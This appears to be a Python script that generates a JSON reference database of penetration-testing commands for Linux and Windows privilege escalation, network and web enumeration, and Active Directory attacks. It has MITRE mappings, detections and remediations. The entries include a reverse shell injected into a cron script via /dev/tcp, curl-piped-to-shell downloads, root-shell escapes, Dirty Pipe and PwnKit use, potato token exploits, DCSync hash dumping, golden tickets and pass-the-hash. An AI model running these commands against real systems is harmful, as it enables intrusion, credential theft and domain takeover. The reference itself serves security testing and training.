#!/usr/bin/env python3
"""Batch 10 — final push to 400+. Privesc, enumeration, AD, recon expansion."""
import json
from pathlib import Path
OUTPUT_DIR = Path(__file__).parent.parent / "data" / "commands"

def e(id,tool,cat,phase,os,cmd,name,desc,args,output,use_case,prereqs,mitre,tactic,detections,remediation,mistakes,alts,refs,tags):
    return {"id":id,"tool":tool,"category":cat,"phase":phase,"os":os,"command":cmd,"name":name,"description":desc,"arguments":args,"expected_output":output,"use_case":use_case,"prerequisites":prereqs,"mitre_mapping":mitre,"mitre_tactic":tactic,"detections":detections,"remediation":remediation,"common_mistakes":mistakes,"alternatives":alts,"references":refs,"tags":tags}

L=["linux"];LW=["linux","windows"];LWM=["linux","windows","macos"];W=["windows"]

# ===================== PRIVILEGE ESCALATION (18) =====================
PRIVESC10=[
e("linpeas-auto","linpeas","privilege_escalation",5,L,
"curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh",
"LinPEAS Automated Enumeration","Comprehensive Linux privilege escalation enumeration — finds SUID, cron, capabilities, writable paths.",
{},"════════════════════════════════════════\n[+] SUID binaries: /usr/bin/pkexec\n[+] Writable /etc/passwd\n[+] Cron: * * * * * root /opt/backup.sh (writable!)",
"Automated privesc enumeration — run first on any Linux target.",
["Shell access on Linux"],["T1068"],"Privilege Escalation",
["Script download","Enumeration commands"],["Fix identified misconfigurations"],
["Transfer blocked (use manual checks)"],["linEnum","linux-exploit-suggester"],
["https://github.com/carlospolop/PEASS-ng"],
["linpeas","automated","enumeration","suid","privesc"]),
e("winpeas-auto","winpeas","privilege_escalation",5,W,
"winPEASx64.exe quiet servicesinfo applicationsinfo",
"WinPEAS Automated Enumeration","Comprehensive Windows privilege escalation enumeration.",
{"quiet":"Less output","servicesinfo":"Check services","applicationsinfo":"Check apps"},
"[+] Unquoted service path: C:\\Program Files\\Vuln App\\service.exe\n[+] Modifiable service: VulnSvc\n[+] AlwaysInstallElevated: ENABLED",
"Automated Windows privesc enumeration — finds service misconfigs, registry keys, credentials.",
["Shell on Windows"],["T1068"],"Privilege Escalation",
["Enumeration activity","Script execution"],["Fix identified misconfigurations"],
["AV blocks winPEAS"],["PowerUp","Seatbelt","SharpUp"],
["https://github.com/carlospolop/PEASS-ng"],
["winpeas","automated","windows","services","privesc"]),
e("sudo-exploit","sudo","privilege_escalation",5,L,
"sudo -l\n# If (ALL) NOPASSWD: /usr/bin/vim\nsudo vim -c ':!/bin/bash'",
"Sudo Misconfiguration Exploit","Exploits sudo permissions to escalate — GTFOBins for allowed commands.",
{"sudo -l":"List sudo permissions"},"User may run: (ALL) NOPASSWD: /usr/bin/vim\n# vim → :!/bin/bash\nroot@target:#",
"Escalate via misconfigured sudo — check GTFOBins for each allowed binary.",
["sudo -l shows exploitable binary"],["T1548.003"],"Privilege Escalation",
["Sudo usage logs","Unusual command execution"],["Restrict sudo permissions","Use sudoedit"],
["No sudo permissions"],["GTFOBins lookup"],
["https://gtfobins.github.io"],
["sudo","gtfobins","misconfiguration","nopasswd","privesc"]),
e("suid-exploit","find","privilege_escalation",5,L,
"find / -perm -4000 -type f 2>/dev/null\n# If /usr/bin/find has SUID:\nfind . -exec /bin/bash -p \\;",
"SUID Binary Exploitation","Finds and exploits SUID binaries for privilege escalation.",
{"-perm -4000":"Find SUID files","-exec":"Execute command as owner"},
"/usr/bin/find (SUID)\n# Exploit:\nbash-5.1# id\nuid=1000(user) gid=1000(user) euid=0(root)",
"Exploit SUID binaries — many can spawn root shells via GTFOBins.",
["SUID binary with GTFOBins entry"],["T1548.001"],"Privilege Escalation",
["SUID execution","Unusual process lineage"],["Remove unnecessary SUID bits"],
["No exploitable SUID binaries"],["capabilities check","writable scripts"],
["https://gtfobins.github.io"],
["suid","binary","gtfobins","root","linux"]),
e("capabilities-exploit","getcap","privilege_escalation",5,L,
"getcap -r / 2>/dev/null\n# If python3 has cap_setuid:\npython3 -c 'import os; os.setuid(0); os.system(\"/bin/bash\")'",
"Linux Capabilities Exploitation","Exploits Linux capabilities (like cap_setuid) for privilege escalation.",
{"getcap -r /":"Find all capabilities recursively"},
"/usr/bin/python3 = cap_setuid+ep\n# Exploit:\nroot@target:#",
"Capabilities are often overlooked — can grant root-equivalent powers to binaries.",
["Binary with dangerous capability"],["T1548.001"],"Privilege Escalation",
["Capability usage","setuid syscall from non-root"],["Remove unnecessary capabilities"],
["No exploitable capabilities"],["linpeas","manual enumeration"],
["https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/linux-capabilities.html"],
["capabilities","cap_setuid","linux","overlooked","privesc"]),
e("cron-exploit","crontab","privilege_escalation",5,L,
"cat /etc/crontab\nls -la /opt/backup.sh  # writable by user!\necho '/bin/bash -i >& /dev/tcp/<attacker>/4444 0>&1' >> /opt/backup.sh",
"Cron Job Exploitation","Exploits writable cron scripts running as root.",
{},"* * * * * root /opt/backup.sh\n-rwxrwxrwx 1 root root /opt/backup.sh",
"If a root cron job runs a writable script, inject a reverse shell.",
["Writable script in root cron"],["T1053.003"],"Privilege Escalation",
["Modified cron scripts","New outbound connections"],["Fix script permissions","Use absolute paths"],
["Script not writable"],["pspy (monitor cron without root)"],
["https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/#scheduled-cron-jobs"],
["cron","writable","script","root","scheduled"]),
e("docker-escape","docker","privilege_escalation",5,L,
"# If user is in docker group:\ndocker run -v /:/mnt --rm -it alpine chroot /mnt bash",
"Docker Group Privilege Escalation","Escapes to root by mounting host filesystem via Docker.",
{"-v /:/mnt":"Mount host root","chroot /mnt":"Change root to host"},
"root@container:/# cat /etc/shadow\nroot:$6$...",
"If user is in docker group, trivially escalate to root on host.",
["User in docker group"],["T1611"],"Privilege Escalation",
["Docker container creation","Host filesystem mount"],["Remove users from docker group","Use rootless Docker"],
["Not in docker group"],["lxd group exploit"],
["https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/"],
["docker","group","escape","mount","container"]),
e("kernel-exploit-dirty-pipe","exploit","privilege_escalation",5,L,
"# CVE-2022-0847 (Dirty Pipe) — Linux 5.8-5.16.11\ngcc dirty_pipe.c -o exploit && ./exploit /etc/passwd",
"Dirty Pipe Kernel Exploit","Overwrites read-only files via pipe buffer — affects Linux 5.8 to 5.16.11.",
{},"[+] Overwriting /etc/passwd...\n[+] Root shell spawned\nroot@target:#",
"Kernel exploit for recent Linux versions — very reliable when applicable.",
["Vulnerable kernel (5.8-5.16.11)","gcc or pre-compiled exploit"],["T1068"],"Privilege Escalation",
["Unusual pipe operations","/etc/passwd modification"],["Update kernel"],
["Kernel already patched"],["DirtyC0w (older kernels)","PwnKit"],
["https://dirtypipe.cm4all.com"],
["dirty-pipe","kernel","cve-2022-0847","overwrite","linux"]),
e("pwnkit-exploit","pkexec","privilege_escalation",5,L,
"# CVE-2021-4034 (PwnKit) — affects most Linux distros\npython3 pwnkit.py",
"PwnKit (Polkit pkexec)","Exploits pkexec SUID vulnerability — works on almost all Linux distros since 2009.",
{},"[+] Exploiting CVE-2021-4034...\n[+] Root shell!\nroot@target:#",
"Universal Linux privesc — works on nearly every unpatched system.",
["pkexec installed (default on most distros)","Unpatched"],["T1068"],"Privilege Escalation",
["pkexec execution with unusual arguments"],["Patch polkit","Remove SUID from pkexec"],
["Already patched"],["Dirty Pipe","kernel exploits"],
["https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034"],
["pwnkit","polkit","pkexec","universal","cve-2021-4034"]),
e("unquoted-service-path","wmic","privilege_escalation",5,W,
"wmic service get name,displayname,pathname,startmode | findstr /i \"auto\" | findstr /i /v \"C:\\Windows\"",
"Unquoted Service Path","Finds Windows services with unquoted paths containing spaces — allows DLL/EXE hijacking.",
{},"VulnSvc  C:\\Program Files\\Vuln App\\service.exe  Auto",
"If path has spaces and isn't quoted, Windows checks each space as potential executable location.",
["Shell on Windows"],["T1574.009"],"Privilege Escalation",
["New executable in Program Files","Service restart"],["Quote all service paths"],
["No unquoted paths found"],["PowerUp","winPEAS"],
["https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/#unquoted-service-paths"],
["unquoted","service-path","windows","hijack","spaces"]),
e("always-install-elevated","reg","privilege_escalation",5,W,
"reg query HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer /v AlwaysInstallElevated\nreg query HKCU\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer /v AlwaysInstallElevated",
"AlwaysInstallElevated Exploit","If both registry keys are set to 1, any user can install MSI as SYSTEM.",
{},"AlwaysInstallElevated    REG_DWORD    0x1",
"Generate malicious MSI with msfvenom and install as SYSTEM.",
["Both registry keys set to 1"],["T1548"],"Privilege Escalation",
["MSI installation by non-admin","Event 1033/1034"],["Disable AlwaysInstallElevated"],
["Keys not set"],["msfvenom -f msi","PowerUp"],
["https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/#alwaysinstallelevated"],
["msi","elevated","registry","windows","installer"]),
e("token-impersonation","juicypotato","privilege_escalation",5,W,
"JuicyPotato.exe -l 1337 -p c:\\windows\\system32\\cmd.exe -a '/c whoami' -t *",
"Token Impersonation (JuicyPotato)","Exploits SeImpersonatePrivilege to escalate from service account to SYSTEM.",
{"-l":"COM server port","-p":"Program to run","-t *":"Try both token types"},
"[+] CreateProcessWithTokenW OK\nnt authority\\system",
"Escalate from IIS/SQL service accounts that have SeImpersonatePrivilege.",
["SeImpersonatePrivilege","Windows < 2019"],["T1134.001"],"Privilege Escalation",
["COM object creation","Token manipulation"],["Remove SeImpersonatePrivilege where possible"],
["Windows 2019+ (use PrintSpoofer/GodPotato)"],["PrintSpoofer","GodPotato","SweetPotato"],
["https://github.com/ohpe/juicy-potato"],
["potato","token","impersonation","seimpersonate","service"]),
e("printspoofer-privesc","printspoofer","privilege_escalation",5,W,
"PrintSpoofer.exe -i -c cmd",
"PrintSpoofer (Modern Potato)","Exploits print spooler to escalate from SeImpersonatePrivilege to SYSTEM — works on modern Windows.",
{"-i":"Interactive","-c cmd":"Command to run"},
"[+] Found privilege: SeImpersonatePrivilege\n[+] Named pipe listening...\n[+] Got SYSTEM!\nC:\\WINDOWS\\system32>whoami\nnt authority\\system",
"Modern replacement for JuicyPotato — works on Windows 10/2019+.",
["SeImpersonatePrivilege","Windows 10/2019+"],["T1134.001"],"Privilege Escalation",
["Named pipe creation","Print spooler interaction"],["Remove SeImpersonatePrivilege"],
["Print spooler disabled"],["GodPotato","SweetPotato"],
["https://github.com/itm4n/PrintSpoofer"],
["printspoofer","potato","modern","seimpersonate","windows"]),
e("godpotato-latest","godpotato","privilege_escalation",5,W,
"GodPotato.exe -cmd 'cmd /c whoami'",
"GodPotato (Latest Potato)","Latest potato exploit — works on Windows 2012-2022 with SeImpersonatePrivilege.",
{"-cmd":"Command to execute as SYSTEM"},
"[*] CombaseDisableUserDirectoryPatching: true\n[*] Got SYSTEM token\nnt authority\\system",
"Most reliable modern potato — works across all recent Windows versions.",
["SeImpersonatePrivilege"],["T1134.001"],"Privilege Escalation",
["DCOM/RPC activity","Token manipulation"],["Remove SeImpersonatePrivilege"],
["No SeImpersonatePrivilege"],["PrintSpoofer","SweetPotato"],
["https://github.com/BeichenDream/GodPotato"],
["godpotato","latest","potato","universal","windows"]),
e("runas-saved-creds","runas","privilege_escalation",5,W,
"cmdkey /list\nrunas /savecred /user:CORP\\admin cmd.exe",
"RunAs with Saved Credentials","Uses Windows Credential Manager saved credentials to run commands as another user.",
{"/savecred":"Use saved credentials","/user":"Target user"},
"Currently stored credentials:\n  Target: CORP\\admin\n  Type: Domain Password\n# runas spawns cmd as admin",
"Escalate using credentials saved in Windows Credential Manager.",
["Saved credentials in Credential Manager"],["T1078"],"Privilege Escalation",
["RunAs execution (Event 4648)"],["Don't save credentials","Clear Credential Manager"],
["No saved credentials"],["mimikatz vault::cred"],
["https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/#runas"],
["runas","saved","credentials","credential-manager","windows"]),
e("path-hijack","export","privilege_escalation",5,L,
"echo '/bin/bash' > /tmp/ps && chmod +x /tmp/ps && export PATH=/tmp:$PATH\n# Now run the vulnerable SUID binary that calls 'ps'",
"PATH Hijacking","Exploits SUID binaries that call commands without absolute paths.",
{},"# SUID binary calls 'ps' without /usr/bin/ps\n# Our fake 'ps' in /tmp runs as root\nroot@target:#",
"If SUID binary uses relative paths, hijack PATH to execute your code as root.",
["SUID binary calling commands without absolute path"],["T1574.007"],"Privilege Escalation",
["Unusual PATH modifications","Binary execution from /tmp"],["Use absolute paths in scripts"],
["Binary uses absolute paths"],["library hijacking","LD_PRELOAD"],
["https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/#path-hijacking"],
["path","hijack","suid","relative","linux"]),
e("ld-preload-privesc","gcc","privilege_escalation",5,L,
"echo void_init > /tmp/pe.c && gcc -shared -fPIC -nostartfiles -o /tmp/pe.so /tmp/pe.c && sudo LD_PRELOAD=/tmp/pe.so <allowed_command>",
"LD_PRELOAD Privilege Escalation","Exploits sudo with LD_PRELOAD in env_keep to load malicious shared library.",
{"LD_PRELOAD":"Preload shared library before execution"},
"root@target:#",
"If sudo preserves LD_PRELOAD, inject a shared library that spawns root shell.",
["sudo with env_keep+=LD_PRELOAD","gcc available"],["T1574.006"],"Privilege Escalation",
["Shared library loading from unusual paths"],["Remove LD_PRELOAD from env_keep"],
["LD_PRELOAD not in env_keep"],["LD_LIBRARY_PATH hijacking"],
["https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/#ld_preload"],
["ld_preload","shared-library","sudo","injection","linux"]),
]

# ===================== ENUMERATION (18) =====================
ENUM10=[
e("enum4linux-ng","enum4linux-ng","enumeration",2,L,
"enum4linux-ng -A <target>",
"Enum4linux-ng (Modern SMB Enum)","Modern rewrite of enum4linux — enumerates SMB shares, users, groups, policies.",
{"-A":"All enumeration"},
"Users: admin, jsmith, svc_backup\nShares: C$, ADMIN$, Backups (READ)\nPassword Policy: min 8, lockout 5/30min",
"Comprehensive SMB/AD enumeration — first tool to run against Windows targets.",
["SMB accessible (445)"],["T1087"],"Discovery",
["SMB enumeration attempts","Multiple RPC calls"],["Restrict anonymous access","Disable SMBv1"],
["Anonymous access blocked"],["crackmapexec","smbclient","rpcclient"],
["https://github.com/cddmp/enum4linux-ng"],
["enum4linux","smb","users","shares","enumeration"]),
e("smbclient-list","smbclient","enumeration",2,L,
"smbclient -L //<target>/ -N",
"SMB Share Listing","Lists available SMB shares — anonymous or authenticated.",
{"-L":"List shares","-N":"No password (null session)"},
"Sharename  Type  Comment\n---------  ----  -------\nBackups    Disk  Company backups\nIPC$       IPC   Remote IPC",
"Quick SMB share enumeration — check for readable shares with sensitive data.",
["SMB accessible"],["T1135"],"Discovery",
["SMB connection attempts"],["Restrict share access","Disable null sessions"],
["Null session blocked"],["crackmapexec smb --shares","net view"],
["https://www.samba.org/samba/docs/current/man-html/smbclient.1.html"],
["smbclient","shares","listing","null-session","smb"]),
e("ldapsearch-users","ldapsearch","enumeration",2,L,
"ldapsearch -x -H ldap://<dc> -b 'DC=corp,DC=local' '(objectClass=user)' sAMAccountName description",
"LDAP User Enumeration","Queries Active Directory via LDAP for all user accounts and descriptions.",
{"-x":"Simple auth","-H":"LDAP URI","-b":"Base DN","(objectClass=user)":"Filter"},
"dn: CN=John Smith,OU=Users,DC=corp,DC=local\nsAMAccountName: jsmith\ndescription: Temp password: Welcome1!",
"Enumerate AD users — descriptions often contain passwords!",
["LDAP accessible (389)","Anonymous or valid creds"],["T1087.002"],"Discovery",
["LDAP queries from non-standard sources"],["Disable anonymous LDAP","Don't put passwords in descriptions"],
["Anonymous LDAP blocked"],["crackmapexec ldap","windapsearch"],
["https://linux.die.net/man/1/ldapsearch"],
["ldap","users","active-directory","description","enumeration"]),
e("snmpwalk-enum","snmpwalk","enumeration",2,L,
"snmpwalk -v2c -c public <target> 1.3.6.1.2.1",
"SNMP Enumeration","Walks SNMP MIB tree — reveals system info, interfaces, routes, running processes.",
{"-v2c":"SNMP version 2c","-c public":"Community string"},
"sysDescr: Linux server 5.15.0\nsysName: web01\nifDescr: eth0 (10.0.0.5)\nhrSWRunName: apache2, mysql",
"SNMP often reveals extensive system information with default community strings.",
["SNMP accessible (161/udp)","Valid community string"],["T1082"],"Discovery",
["SNMP queries"],["Change default community strings","Use SNMPv3","Restrict SNMP access"],
["Non-default community string"],["onesixtyone (brute community)","snmp-check"],
["https://linux.die.net/man/1/snmpwalk"],
["snmp","walk","community","mib","enumeration"]),
e("rpcclient-enum","rpcclient","enumeration",2,L,
"rpcclient -U '' -N <target> -c 'enumdomusers; enumdomgroups; getdompwinfo'",
"RPC Client Domain Enumeration","Enumerates domain users, groups, and password policy via MS-RPC.",
{"-U ''":"Empty username","-N":"No password","-c":"Commands to run"},
"user:[admin] rid:[0x1f4]\nuser:[jsmith] rid:[0x450]\ngroup:[Domain Admins] rid:[0x200]\nMin password length: 8",
"Enumerate AD information via RPC — often works with null sessions.",
["RPC accessible (135/445)"],["T1087.002"],"Discovery",
["RPC enumeration calls"],["Disable null sessions","Restrict RPC access"],
["Null session blocked"],["enum4linux-ng","crackmapexec"],
["https://www.samba.org/samba/docs/current/man-html/rpcclient.1.html"],
["rpcclient","rpc","users","groups","null-session"]),
e("bloodhound-collect","sharphound","enumeration",2,W,
"SharpHound.exe -c All --outputdirectory C:\\temp\\",
"BloodHound Collection (SharpHound)","Collects Active Directory relationship data for BloodHound graph analysis.",
{"-c All":"Collect all data types","--outputdirectory":"Output location"},
"[+] Resolved Collection Methods: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote\n[+] Finished collection in 00:02:34\n[+] Compressing data to C:\\temp\\20240101_BloodHound.zip",
"Collect AD data for attack path analysis — essential for AD pentesting.",
["Domain user credentials","Domain-joined machine"],["T1087.002"],"Discovery",
["LDAP queries","SAMR calls","NetSessionEnum"],["Monitor for SharpHound signatures","Restrict session enumeration"],
["AV blocks SharpHound"],["bloodhound-python","ADExplorer"],
["https://github.com/SpecterOps/BloodHound"],
["bloodhound","sharphound","active-directory","graph","paths"]),
e("bloodhound-python","bloodhound-python","enumeration",2,L,
"bloodhound-python -u jsmith -p 'Password1!' -d corp.local -ns <dc_ip> -c all",
"BloodHound Collection (Python)","Linux-based BloodHound collector — no need for domain-joined machine.",
{"-u":"Username","-p":"Password","-d":"Domain","-c all":"Collect all"},
"[+] Connecting to LDAP...\n[+] Found 1500 users\n[+] Found 200 groups\n[+] Wrote JSON files for BloodHound import",
"Collect BloodHound data from Linux — useful when you only have creds, not a domain machine.",
["Valid domain credentials","Network access to DC"],["T1087.002"],"Discovery",
["LDAP queries from Linux host"],["Monitor LDAP query patterns"],
["Credentials invalid"],["SharpHound","ADExplorer"],
["https://github.com/dirkjanm/BloodHound.py"],
["bloodhound","python","linux","collection","active-directory"]),
e("ffuf-vhost","ffuf","enumeration",2,L,
"ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://<target> -H 'Host: FUZZ.<domain>' -fs <default_size>",
"Virtual Host Discovery (FFUF)","Discovers virtual hosts by fuzzing the Host header — finds hidden sites on same IP.",
{"-H 'Host: FUZZ...'":"Fuzz Host header","-fs":"Filter by response size"},
"[Status: 200, Size: 4521] dev.target.com\n[Status: 200, Size: 1203] staging.target.com\n[Status: 200, Size: 892] internal.target.com",
"Find hidden virtual hosts that aren't in DNS — often contain dev/staging environments.",
["Target IP","Wordlist"],["T1595"],"Reconnaissance",
["Many requests with different Host headers"],["Don't host sensitive vhosts on public IPs"],
["All vhosts return same size"],["gobuster vhost","wfuzz"],
["https://github.com/ffuf/ffuf"],
["vhost","virtual-host","ffuf","hidden","discovery"]),
e("feroxbuster-dir","feroxbuster","enumeration",2,L,
"feroxbuster -u http://<target> -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -x php,txt,bak --smart",
"Feroxbuster Directory Brute-Force","Fast recursive directory/file discovery — Rust-based, faster than gobuster.",
{"-x":"Extensions to check","--smart":"Smart filtering"},
"200  GET  /admin/config.php\n200  GET  /backup/db.sql.bak\n301  GET  /api/ → /api/v1/\n403  GET  /server-status",
"Fast directory discovery with recursion — finds hidden files and backups.",
["Web server accessible"],["T1595"],"Reconnaissance",
["Rapid HTTP requests to many paths"],["Remove sensitive files","Restrict directory access"],
["WAF blocks brute-force"],["gobuster","dirsearch","dirb"],
["https://github.com/epi052/feroxbuster"],
["feroxbuster","directory","brute-force","fast","recursive"]),
e("whatweb-fingerprint","whatweb","enumeration",2,LWM,
"whatweb -a 3 http://<target>",
"WhatWeb Technology Fingerprinting","Identifies web technologies — CMS, frameworks, servers, JavaScript libraries.",
{"-a 3":"Aggressive mode (more requests)"},
"http://target [200 OK] Apache[2.4.49], WordPress[6.1], PHP[8.1], jQuery[3.6.0], Bootstrap",
"Identify technology stack for targeted vulnerability research.",
["Web server accessible"],["T1592"],"Reconnaissance",
["Multiple HTTP requests probing technology"],["Remove version headers","Custom error pages"],
["Heavy WAF blocking"],["wappalyzer","builtwith","httpx -tech-detect"],
["https://github.com/urbanadventurer/WhatWeb"],
["whatweb","fingerprint","technology","cms","identification"]),
e("wafw00f-detect","wafw00f","enumeration",2,L,
"wafw00f http://<target>",
"WAF Detection","Identifies Web Application Firewalls — important to know before attacking.",
{},"[*] Checking http://target\n[+] The site http://target is behind Cloudflare (Cloudflare Inc.)",
"Identify WAF before testing — adjust techniques to bypass specific WAF.",
["Web server accessible"],["T1595"],"Reconnaissance",
["WAF probe requests"],["N/A — WAF is a defense"],
["WAF not detected (might still exist)"],["nmap http-waf-detect","manual testing"],
["https://github.com/EnableSecurity/wafw00f"],
["waf","detection","firewall","bypass","identification"]),
e("amass-subdomain","amass","enumeration",2,L,
"amass enum -d <domain> -passive -o subdomains.txt",
"Amass Passive Subdomain Enumeration","Discovers subdomains using passive sources — certificate transparency, DNS databases, archives.",
{"-passive":"No active probing","-o":"Output file"},
"admin.target.com\napi.target.com\ndev.target.com\nstaging.target.com\nvpn.target.com\n[+] Found 47 subdomains",
"Passive subdomain discovery — completely undetectable by target.",
["Target domain"],["T1590.002"],"Reconnaissance",
["Cannot detect — passive only"],["Monitor certificate transparency","Use wildcard certs"],
["Few results (small org)"],["subfinder","crt.sh","SecurityTrails"],
["https://github.com/owasp-amass/amass"],
["amass","subdomain","passive","undetectable","recon"]),
e("httpx-probe","httpx","enumeration",2,L,
"cat subdomains.txt | httpx -status-code -title -tech-detect -follow-redirects",
"HTTPx Probe (Mass HTTP Analysis)","Probes list of hosts for HTTP services — shows status, title, technology.",
{"-status-code":"Show status","-title":"Show page title","-tech-detect":"Detect technology"},
"https://admin.target.com [200] [Admin Panel] [PHP,Apache]\nhttps://api.target.com [200] [API Docs] [Node.js]\nhttp://dev.target.com [401] [Login Required] [Nginx]",
"Quickly identify live web services from subdomain list — prioritize targets.",
["List of hosts/subdomains"],["T1595"],"Reconnaissance",
["HTTP requests to many hosts"],["N/A"],
["Many false positives from CDN"],["aquatone","eyewitness"],
["https://github.com/projectdiscovery/httpx"],
["httpx","probe","mass","alive","web"]),
e("rustscan-fast","rustscan","enumeration",2,L,
"rustscan -a <target> --ulimit 5000 -- -sV -sC",
"RustScan (Ultra-Fast Port Scanner)","Scans all 65535 ports in seconds, then passes open ports to nmap for service detection.",
{"-a":"Target","--ulimit":"File descriptor limit","--":"Pass to nmap"},
"Open 10.0.0.5:22,80,443,3306,8080\n[~] Running nmap on open ports...\n22/tcp ssh OpenSSH 8.9\n80/tcp http Apache 2.4",
"Find open ports in seconds — then nmap only scans what's open (much faster workflow).",
["rustscan installed"],["T1046"],"Discovery",
["Very fast SYN scan"],["Rate limiting","IDS"],
["Rate too high for target"],["masscan","nmap -T4"],
["https://github.com/RustScan/RustScan"],
["rustscan","fast","ports","all-ports","speed"]),
e("gobuster-dns","gobuster","enumeration",2,L,
"gobuster dns -d <domain> -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -t 50",
"Gobuster DNS Subdomain Brute-Force","Active DNS subdomain brute-force — resolves each subdomain attempt.",
{"dns":"DNS mode","-d":"Domain","-t 50":"50 threads"},
"Found: admin.target.com\nFound: mail.target.com\nFound: vpn.target.com\nFound: dev.target.com",
"Active subdomain discovery — finds subdomains not in passive sources.",
["Target domain","DNS resolution"],["T1590.002"],"Reconnaissance",
["High volume DNS queries"],["Wildcard DNS detection","Rate limiting"],
["Wildcard DNS returns all as valid"],["ffuf","wfuzz","amass -active"],
["https://github.com/OJ/gobuster"],
["gobuster","dns","subdomain","brute-force","active"]),
]

# ===================== ACTIVE DIRECTORY (18) =====================
AD10=[
e("kerberoast-rubeus","rubeus","active_directory",4,W,
"Rubeus.exe kerberoast /outfile:hashes.txt",
"Kerberoasting (Rubeus)","Requests TGS tickets for service accounts and extracts crackable hashes.",
{"kerberoast":"Request all SPNs","/outfile":"Save hashes"},
"[*] Found 5 SPNs\n[*] SPN: MSSQLSvc/sql01.corp.local:1433 (svc_sql)\n[*] Hash: $krb5tgs$23$*svc_sql$...",
"Extract service account password hashes — crack offline without detection.",
["Domain user credentials"],["T1558.003"],"Credential Access",
["TGS requests for multiple SPNs (Event 4769)"],["Use gMSA","Long random service passwords","AES encryption"],
["No SPNs found"],["GetUserSPNs.py (impacket)","PowerView"],
["https://github.com/GhostPack/Rubeus"],
["kerberoast","spn","service-account","rubeus","tgs"]),
e("asreproast-rubeus","rubeus","active_directory",4,W,
"Rubeus.exe asreproast /outfile:asrep_hashes.txt",
"AS-REP Roasting (Rubeus)","Finds accounts without Kerberos pre-authentication and extracts crackable AS-REP hashes.",
{"asreproast":"Find no-preauth accounts"},
"[*] Found 2 accounts without pre-auth\n[*] User: svc_legacy\n[*] Hash: $krb5asrep$23$svc_legacy@CORP...",
"Extract hashes from accounts with 'Do not require Kerberos preauthentication' — crack offline.",
["Domain user credentials"],["T1558.004"],"Credential Access",
["AS-REQ without pre-auth (Event 4768)"],["Enable pre-authentication on all accounts","Strong passwords"],
["No accounts without pre-auth"],["GetNPUsers.py (impacket)"],
["https://github.com/GhostPack/Rubeus"],
["asreproast","pre-auth","kerberos","rubeus","offline"]),
e("dcsync-secretsdump","impacket","active_directory",4,L,
"secretsdump.py corp.local/admin:'Password1!'@<dc_ip>",
"DCSync (Secretsdump)","Replicates domain controller data to extract all password hashes — game over for AD.",
{},"[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)\nAdministrator:500:aad3b435...:fc525c9683e8fe067095ba2ddc971889:::\nkrbtgt:502:aad3b435...:a]b2c3d4e5f6...",
"Extract ALL domain password hashes — requires Domain Admin or replication rights.",
["Domain Admin or DCSync rights"],["T1003.006"],"Credential Access",
["Replication traffic from non-DC (Event 4662)","DRS GetNCChanges"],
["Monitor for DCSync","Restrict replication rights","Tiered admin model"],
["Insufficient privileges"],["mimikatz lsadump::dcsync"],
["https://github.com/fortra/impacket"],
["dcsync","secretsdump","domain-admin","hashes","game-over"]),
e("golden-ticket","mimikatz","active_directory",4,W,
"mimikatz # kerberos::golden /user:fakeadmin /domain:corp.local /sid:S-1-5-21-... /krbtgt:<ntlm_hash> /ptt",
"Golden Ticket Attack","Forges Kerberos TGT using krbtgt hash — unlimited domain access for 10 years.",
{"/krbtgt":"krbtgt NTLM hash","/ptt":"Pass the ticket"},
"[*] Golden ticket for 'fakeadmin @ corp.local' successfully submitted for current session",
"Forge TGT for any user — complete domain compromise. Persists until krbtgt password changed twice.",
["krbtgt NTLM hash (from DCSync)"],["T1558.001"],"Persistence",
["TGT with unusual lifetime","Non-existent user in TGT"],
["Change krbtgt password twice","Monitor for anomalous tickets"],
["krbtgt hash not available"],["silver ticket (per-service)"],
["https://adsecurity.org/?p=1640"],
["golden-ticket","krbtgt","persistence","kerberos","forge"]),
e("silver-ticket","mimikatz","active_directory",4,W,
"mimikatz # kerberos::golden /user:admin /domain:corp.local /sid:S-1-5-21-... /target:sql01.corp.local /service:MSSQLSvc /rc4:<service_hash> /ptt",
"Silver Ticket Attack","Forges TGS for specific service — doesn't touch DC, harder to detect than golden ticket.",
{"/target":"Target server","/service":"Service name","/rc4":"Service account hash"},
"[*] Silver ticket for MSSQLSvc/sql01.corp.local successfully submitted",
"Access specific service without touching DC — stealthier than golden ticket.",
["Service account NTLM hash"],["T1558.002"],"Credential Access",
["TGS without corresponding TGT request at DC"],
["Use gMSA","Rotate service passwords","PAC validation"],
["Service account hash not available"],["golden ticket"],
["https://adsecurity.org/?p=2011"],
["silver-ticket","tgs","stealth","service","forge"]),
e("pass-the-hash","impacket","active_directory",4,L,
"psexec.py -hashes :fc525c9683e8fe067095ba2ddc971889 corp.local/admin@<target>",
"Pass the Hash (Impacket)","Authenticates using NTLM hash without knowing the password — lateral movement.",
{"-hashes :hash":"LM:NT hash format (empty LM)"},
"[*] Requesting shares on target...\n[*] Found writable share ADMIN$\n[*] Uploading file...\nC:\\Windows\\system32>whoami\ncorp\\admin",
"Move laterally using captured NTLM hashes — no password cracking needed.",
["NTLM hash","Local admin on target"],["T1550.002"],"Lateral Movement",
["NTLM auth without corresponding password logon","Event 4624 type 3"],
["Disable NTLM","Enable Credential Guard","Restrict local admin"],
["Target requires Kerberos only"],["crackmapexec","evil-winrm -H"],
["https://github.com/fortra/impacket"],
["pass-the-hash","pth","ntlm","lateral","impacket"]),
e("pass-the-ticket","rubeus","active_directory",4,W,
"Rubeus.exe ptt /ticket:ticket.kirbi",
"Pass the Ticket","Injects a Kerberos ticket into the current session — access resources as that user.",
{"/ticket":"Base64 or file path to ticket"},
